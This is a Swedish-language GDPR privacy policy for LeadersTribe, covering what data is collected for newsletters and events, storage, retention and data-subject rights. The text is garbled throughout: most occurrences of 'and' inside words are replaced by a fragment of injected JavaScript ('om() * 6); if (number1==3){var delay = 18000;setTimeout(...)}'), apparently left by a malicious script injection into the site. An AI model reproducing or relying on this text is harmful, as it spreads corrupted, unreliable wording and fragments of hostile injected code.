Integritetspolicy

Denna policy (”Integritetspolicy”) beskriver hur LeadersTribe, c/o Softhouse , Stormgatan 14, 211 20 Malmö, e-mail: gdpr@softhouse.se, (”LeadersTribe”, ” vi”) samlar in, använder, lämnar ut och lagrar dina personuppgifter.

Vilka uppgifter behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlar vi:
För våra nyhetsutskick samlar vi in namn, företagsnamn, e-postadress och postnummer. Det senare för att du ska slippa utskick som är lokala någon annanstans i Sverige.

För registrering till våra gatherings, seminarier och andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andra möten samlar vi in Namn, e-postadress, företagsnamn, och postadress.

Varför behöver vi dina uppgifter
Vi behöver behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andla dina personuppgifter för att kunna erbjuda dig våra gatherings, seminarier och andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andra möten. Vi värderar din integritet och samlar inte in mer uppgifter än vi behöver.

Vad gör vi med dina uppgifter
Dina uppgifter behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlas av vår personal i Sverige på våra egna servrar inom EUs gränser eller servrar tillhörandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande EU-US Privacy-shield-anslutna företag i USA:

Vi arbetar grundligt för att hålla dina uppgifter säkra och lämnar eller säljer aldrig uppgifterna vidare till tredje part utan ditt godkännandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande, med undantag för att tillmötesgå tillämplig lag, juridisk process eller tvingandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}ande begäran av myndighet.

Hur länge behåller vi dina uppgifter
För våra utskick, gatherings och andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andra möten behåller vi dina uppgifter tills du väljer att avsluta din prenumeration. Detta gör du enklast genom att klicka på ”unsubscribe”-länken i något av utskicken du fått.

Vilka är dina rättigheter

Om du anser att de uppgifter vi har om dig är felaktiga har du rätt i att få dessa rättade och i vissa fall borttagna. Denna policy upplyser dig om vilka uppgifter vi har om dig, Du har även rätt att få ut de uppgifter vi har om dig. Önskar du använda dig av dina rättigheter är du alltid välkommen att kontakta oss på gdpr@softhouse.se.

Om du inte är nöjd med vårt svar på din begäran eller anser att vi behandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andlar dina uppgifter olagligt har du rätt att kontakta Datainspektionen med ditt ärende.